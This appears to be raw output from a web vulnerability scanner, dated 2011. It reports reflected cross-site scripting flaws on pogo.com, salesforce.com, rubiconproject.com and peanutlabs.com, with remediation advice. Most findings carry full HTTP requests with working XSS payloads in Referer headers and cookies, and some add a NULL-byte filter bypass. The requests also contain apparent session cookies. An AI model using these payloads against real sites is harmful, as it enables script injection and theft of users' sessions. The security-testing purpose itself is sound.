The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0087a19</script>8fdc2d67036 was submitted in the Referer HTTP header. This input was echoed as 87a19</script>8fdc2d67036 in the application's response.
This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /puzzle-games HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=; Referer: http://www.google.com/search?hl=en&q=%0087a19</script>8fdc2d67036
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b03fe</script><script>alert(1)</script>e7e18f9aee9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sitemap HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=; Referer: http://www.google.com/search?hl=en&q=b03fe</script><script>alert(1)</script>e7e18f9aee9
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e93c</script>9a2837e5673 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /word-games?pageSection=footer_word HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=; Referer: http://www.google.com/search?hl=en&q=1e93c</script>9a2837e5673
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dffd5</script><script>alert(1)</script>67ec067b57f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /word-games?pageSection=categorybar_word HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=; Referer: dffd5</script><script>alert(1)</script>67ec067b57f
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 741b6</script><script>alert(1)</script>9348f64da1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /action/pogo/signin.do?pageSection=footer_login HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=; Referer: http://www.google.com/search?hl=en&q=741b6</script><script>alert(1)</script>9348f64da1
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 551d6</script><script>alert(1)</script>0c64aa9445a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /action/pogop/heavyregview.do HTTP/1.1 Host: www.pogo.com Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=551d6</script><script>alert(1)</script>0c64aa9445a Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536548428-New%7C1297128548428%3B
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 414b2</script><script>alert(1)</script>2dd15a3077d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /action/pogop/welcome.do?intcmp=cp_10price_1110_roomsel_text HTTP/1.1 Host: www.pogo.com Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=414b2</script><script>alert(1)</script>2dd15a3077d Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52ba1</script><script>alert(1)</script>912b9bb25ebc3f329 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39644</script><script>alert(1)</script>269a596ea9d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f81c1'-alert(1)-'021d67a20b1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /servlet/servlet.WebToLead HTTP/1.1
Host: www.salesforce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=f81c1'-alert(1)-'021d67a20b1
Response
HTTP/1.1 200 OK
Server: SFDC
Is-Processed: true
Content-Type: text/html
Date: Sun, 09 Jan 2011 02:54:03 GMT
Connection: close
Content-Length: 498

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<meta http-equiv="Refresh" content="0; URL=http://www.google.com/search?hl=en
...[SNIP]...
<script>
if (window.location.replace){
window.location.replace('http://www.google.com/search?hl=en&q=f81c1'-alert(1)-'021d67a20b1');
} else {;
window.location.href ='http://www.google.com/search?hl=en&q=f81c1'-alert(1)-'021d67a20b1';
}
</script>
...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f23e'-alert(1)-'f20e7420cb7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /servlet/servlet.WebToLead HTTP/1.1
Host: www.salesforce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=4f23e'-alert(1)-'f20e7420cb7
Response
HTTP/1.1 200 OK
Server: SFDC
Is-Processed: true
Content-Type: text/html
Date: Sun, 09 Jan 2011 05:28:05 GMT
Connection: close
Content-Length: 498

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<meta http-equiv="Refresh" content="0; URL=http://www.google.com/search?hl=en
...[SNIP]...
<script>
if (window.location.replace){
window.location.replace('http://www.google.com/search?hl=en&q=4f23e'-alert(1)-'f20e7420cb7');
} else {;
window.location.href ='http://www.google.com/search?hl=en&q=4f23e'-alert(1)-'f20e7420cb7';
}
</script>
...[SNIP]...
The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5fbf"-alert(1)-"6ccf7185570 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /a/4252/4762/6670-15.js?cb=0.8619239274412394 HTTP/1.1 Host: optimized-by.rubiconproject.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/?sl=2&f9258%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4225969d669=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ruid=a5fbf"-alert(1)-"6ccf7185570; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=4252/4762; ses15=4762^1; rpb=4210%3D1; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; cd=false; au=GIP9HWY4-MADS-10.208.38.239
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:25:48 GMT Server: RAS/1.3 (Unix) Set-Cookie: rdk=4252/4762; expires=Sun, 09-Jan-2011 03:25:48 GMT; max-age=60; path=/; domain=.rubiconproject.com Set-Cookie: rdk15=0; expires=Sun, 09-Jan-2011 03:25:48 GMT; max-age=10; path=/; domain=.rubiconproject.com Set-Cookie: ses15=4762^2; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=106451; path=/; domain=.rubiconproject.com P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: csi15=3188204.js^1^1294539948^1294539948; expires=Sun, 16-Jan-2011 02:25:48 GMT; max-age=604800; path=/; domain=.rubiconproject.com; Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Connection: close Content-Type: application/x-javascript Content-Length: 2395
The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc7a5"-alert(1)-"f5272ad3817 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the pl_lang cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca65a"%3balert(1)//bb0a3c82748 was submitted in the pl_lang cookie. This input was echoed as ca65a";alert(1)//bb0a3c82748 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /js/iFrame/index.php?userId=998826224-3432-8939b981e2 HTTP/1.1 Host: www.e00.peanutlabs.com Proxy-Connection: keep-alive Referer: http://www.peanutlabs.com/userGreeting.php?userId=998826224-3432-8939b981e2&var_val_1=10010&var_key_1=zipcode Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; pl_user_id=8939b981e2-5329197bbf0fb46f475fdce27e545262; pl_lang=ca65a"%3balert(1)//bb0a3c82748; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; __utmc=184043431; __utmb=184043431.1.10.1294536629
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<!-- If ...[SNIP]... .peanutlabs.com/js/iFrame/stylesheet/custom/pogo/pogo_subscriptions.css"/>'); document.write(unescape("%3Cscript src='http://static.e00.peanutlabs.com/js/iFrame/iFrame-js.cssx?publisherId=3432&lang=ca65a";alert(1)//bb0a3c82748.UTF&ref=82' type='text/javascript'%3E%3C/script%3E")); </script> ...[SNIP]...
The value of the pl_lang cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ec9f"%3balert(1)//da7bb47d018 was submitted in the pl_lang cookie. This input was echoed as 2ec9f";alert(1)//da7bb47d018 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /userGreeting.php HTTP/1.1 Host: www.peanutlabs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sex=deleted; pl_email=test4%40fastdial.net; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_lang=2ec9f"%3balert(1)//da7bb47d018; pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; ext_cid=deleted; dob=deleted; PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; pl_profile=deleted; __utmc=184043431; __utmb=184043431.2.10.1294536629;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Issue background
The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.
Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
Request
